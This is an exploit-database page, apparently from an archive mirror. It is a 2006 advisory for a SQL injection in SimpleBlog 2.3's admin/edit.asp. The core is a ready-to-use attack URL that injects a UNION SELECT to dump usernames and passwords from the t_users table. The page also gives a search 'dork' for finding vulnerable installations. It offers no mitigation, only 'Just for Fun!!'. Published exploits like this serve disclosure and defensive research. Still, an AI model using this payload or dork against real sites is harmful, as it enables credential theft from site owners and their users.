SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
# Published : 2006-11-26
# Author : bolivar
# Previous Title : com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability
# Next Title : Liberum Help Desk <= 0.97.3 (details.asp) SQL Injection Vulnerability

# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# www.Syue.com [2006-11-26]